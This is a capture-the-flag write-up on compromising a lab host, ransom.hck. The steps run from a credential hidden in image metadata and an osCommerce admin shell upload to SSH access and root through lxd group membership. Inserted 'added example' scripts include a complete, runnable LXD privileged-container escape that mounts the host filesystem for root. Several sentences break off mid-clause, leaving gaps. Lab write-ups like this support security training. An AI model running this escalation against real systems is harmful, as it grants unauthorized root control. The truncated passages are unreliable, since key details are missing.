As always, I started with an nmap port scan, and nmap said there were some ports open along with HTTP and SSH. After some enumeration we found a way to exploit the HTTP service and gained user access to the machine. After running the LinEnum.sh script I saw that our user's access could be misconfigured. I had seen a similar question before, so I thought I could capture the flag. Then I did a Google search and found a writeup about it; I did the privilege escalation with that writeup and captured the flag.
Starting with nmap scan
It had some ports open. When I see an HTTP port open in CTFs, I visit it with my browser. The website redirected me to another address called ransom.hck. My browser couldn't find the server address because there was no such domain as ransom.hck in the domain name servers. Therefore, I added this domain to my computer's hosts file manually.
Browsing the pages/directories
When I followed the redirection with my browser it redirected me to ransom.hck/oscommerce. We looked for vulnerabilities in osCommerce on the internet and saw it had a couple of vulnerabilities, some of them authenticated, some of them not. We tried to exploit the osCommerce script without any user credentials, but we failed.
After some time I wanted to look at the source code of the root directory of ransom.hck (I don't know why I hadn't tried it before) to check if we had missed something. Yes, we had totally missed something. When I ran curl -vvv http://ransom.hck I saw something strange: a strange filename commented out in the HTML source code.
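As an added example (not the author's commands, and not the real page source), here is a small shell script that pulls every HTML comment out of a saved page, which is the check that would have exposed the hidden filename on the first pass. The sample HTML and the wording of its comments are constructed; the only thing it shares with the write-up is a filename sitting inside a comment.

```shell
#!/bin/sh
# Added example, not the author's commands: list every <!-- ... --> body in a
# page source. The sample page below is constructed for the demo.

# html_comments FILE -> one trimmed comment body per line.
# Works on the whole file at once via parameter expansion, so multi-line
# comments are caught too (a per-line grep -o would miss them).
html_comments() {
    s=$(cat "$1")
    while :; do
        case "$s" in
            *'<!--'*) ;;
            *) break ;;
        esac
        s=${s#*<!--}                 # drop everything up to the opener
        body=${s%%-->*}              # comment body (rest of file if unterminated)
        case "$s" in
            *'-->'*) s=${s#*-->} ;;  # continue after the closer
            *) s='' ;;               # unterminated comment: nothing left to scan
        esac
        # collapse newlines and trim surrounding whitespace
        printf '%s\n' "$(printf '%s' "$body" | tr '\n' ' ' | sed 's/^[[:space:]]*//; s/[[:space:]]*$//')"
    done
}

# page_comments URL -> same, but fetched live with curl (needs the hosts entry
# for the target name; not used in the offline demo below).
page_comments() {
    tmp=$(mktemp) || return 1
    curl -sSL "$1" -o "$tmp" && html_comments "$tmp"
    rc=$?
    rm -f "$tmp"
    return $rc
}

# Constructed sample page (assumption: not the real ransom.hck source).
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
<html><head><title>shop</title></head>
<body>
<!-- TODO: remove ransom.jpg before release -->
<p>Welcome</p>
<!--
  old link: /admin/
-->
</body></html>
EOF
html_comments "$SAMPLE"
rm -f "$SAMPLE"
```

Against a live target you would call page_comments http://ransom.hck after adding the hosts entry; curl -vvv also shows the comment, but it scrolls past easily in a long response, which is the whole reason for filtering.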
The file was named ransom.jpg; we instantly found that file on the website.
(The ransom.jpg file)
After that we discovered a string in ransom.jpg's metadata.
Continuing with osCommerce Arbitrary File Upload
The string was 12aN5oM. We tried connecting to the machine via SSH by using this string in many combinations, but again we failed. After a while we discovered that the string was the admin password of the osCommerce script.
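As an added example (not the author's commands), the script below shows the quickest way to surface a string like this from an image without exiftool: knock every non-printable byte down to a newline and keep the runs that are long enough to be interesting. It builds a tiny constructed JPEG with a comment segment so it runs offline; that the real ransom.jpg carried the string in a JPEG comment is an assumption for the sample, not something the write-up states.

```shell
#!/bin/sh
# Added example, not the author's commands: pull printable strings out of a
# binary file, the way `strings` or exiftool would expose a comment-field
# credential. The JPEG written by make_sample_jpeg is constructed.

# candidate_strings FILE [MINLEN] -> printable runs of at least MINLEN
# characters (default 6), one per line. `tr -c` maps every byte that is not
# printable ASCII to a newline, so each printable run lands on its own line.
candidate_strings() {
    min=${2:-6}
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | LC_ALL=C grep -E "^.{$min,}$"
}

# make_sample_jpeg FILE COMMENT -> SOI (FFD8), a COM segment (FFFE) carrying
# COMMENT, then EOI (FFD9). The COM length field is big-endian and counts
# its own two bytes plus the payload.
make_sample_jpeg() {
    n=$(( ${#2} + 2 ))
    hi=$(printf '%03o' $(( n / 256 )))
    lo=$(printf '%03o' $(( n % 256 )))
    {
        printf '\377\330'        # SOI
        printf '\377\376'        # COM marker
        printf "\\$hi\\$lo"      # segment length
        printf '%s' "$2"         # comment payload
        printf '\377\331'        # EOI
    } > "$1"
}

# Constructed sample (assumption: comment text is invented, only the string
# itself comes from the write-up).
SAMPLE=$(mktemp)
make_sample_jpeg "$SAMPLE" "password hint: 12aN5oM"
candidate_strings "$SAMPLE"
rm -f "$SAMPLE"
```

On the real file, exiftool ransom.jpg prints every tag it knows about, and candidate_strings ransom.jpg 6 is the fallback when exiftool is not installed; either way, a short odd-looking token is worth trying as a password before spending time on SSH brute force.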
After I uploaded the PHP shell I wanted a reverse shell to my computer. This was an unnecessary step for this question.
Enumerating files to gain SSH access
We enumerated the machine and my team said "there is an interesting file", which was called
We tried to connect to the machine via SSH by using this RSA private key (we found the username earlier from
I usually run the LinEnum.sh script when I have an SSH connection; it's one of my favourite scripts. After it finished it showed me the result. The script said "We're a member of the (lxd) group - could possibly misuse these rights!".
Privilege escalation with LXD/LXC
I had done something like this before, but that was a Docker container related question, and I thought I could do this question as well.
After some research on Google I found a writeup about a Hack The Box machine.
I uploaded my Linux container to the machine, then I did something similar to that writeup; you may want to read it for this step.
Then with the following magical command I gained root privileges:
lxc exec mycontainer /bin/sh
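As an added example (not the author's script, and not the writeup's), the following shell script spells out the commonly documented LXD container escape that ends in that lxc exec: import an image, create a container with security.privileged=true, mount the host's / inside it, start it, and drop into a shell. It assumes the image tarball has already been uploaded to the target (the filename is a placeholder) and that the lxd daemon has a storage pool configured; the has_group check reproduces the LinEnum finding from the shell.

```shell
#!/bin/sh
# Added example, not the author's commands: lxd group check plus the standard
# privileged-container sequence for host root. Placeholders: alpine.tar.gz
# (the uploaded image tarball) and mycontainer (the container name).

# has_group NAME [GROUP_LIST] -> 0 when NAME is in the space-separated list
# (defaults to the current user's groups, the same fact LinEnum reports).
has_group() {
    name=$1
    glist=${2:-$(id -nG)}
    for g in $glist; do
        [ "$g" = "$name" ] && return 0
    done
    return 1
}

# lxd_privesc_plan IMAGE_TARBALL CONTAINER -> prints the setup commands.
# security.privileged=true keeps container root as host uid 0, and the disk
# device exposes the host filesystem at /mnt/root inside the container; that
# pair is what turns "member of lxd" into root on the host.
lxd_privesc_plan() {
    tarball=$1
    name=$2
    cat <<EOF
lxc image import $tarball --alias ${name}-image
lxc init ${name}-image $name -c security.privileged=true
lxc config device add $name hostroot disk source=/ path=/mnt/root recursive=true
lxc start $name
EOF
}

# lxd_privesc IMAGE_TARBALL CONTAINER -> runs the plan, then opens the shell.
# If `lxc image import` complains about a missing storage pool, `lxd init --auto`
# first (assumption: the lxd group lets you run it; it did not matter here).
lxd_privesc() {
    lxd_privesc_plan "$1" "$2" | while IFS= read -r cmd; do
        printf '+ %s\n' "$cmd" >&2
        eval "$cmd" || exit 1    # leaves the subshell running this loop
    done || return 1
    lxc exec "$2" /bin/sh
}

# Only does anything on the target when invoked as: sh privesc.sh run
if [ "${1:-}" = "run" ]; then
    has_group lxd || { echo "current user is not in the lxd group" >&2; exit 1; }
    lxd_privesc alpine.tar.gz mycontainer
fi
```

Inside the container shell the host is under /mnt/root, so the flag is at /mnt/root/root/root.txt and chroot /mnt/root gives a root shell on the host's filesystem; lxd_privesc_plan without run just prints the four setup lines for review.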
After the privesc work it was easy to capture the flag.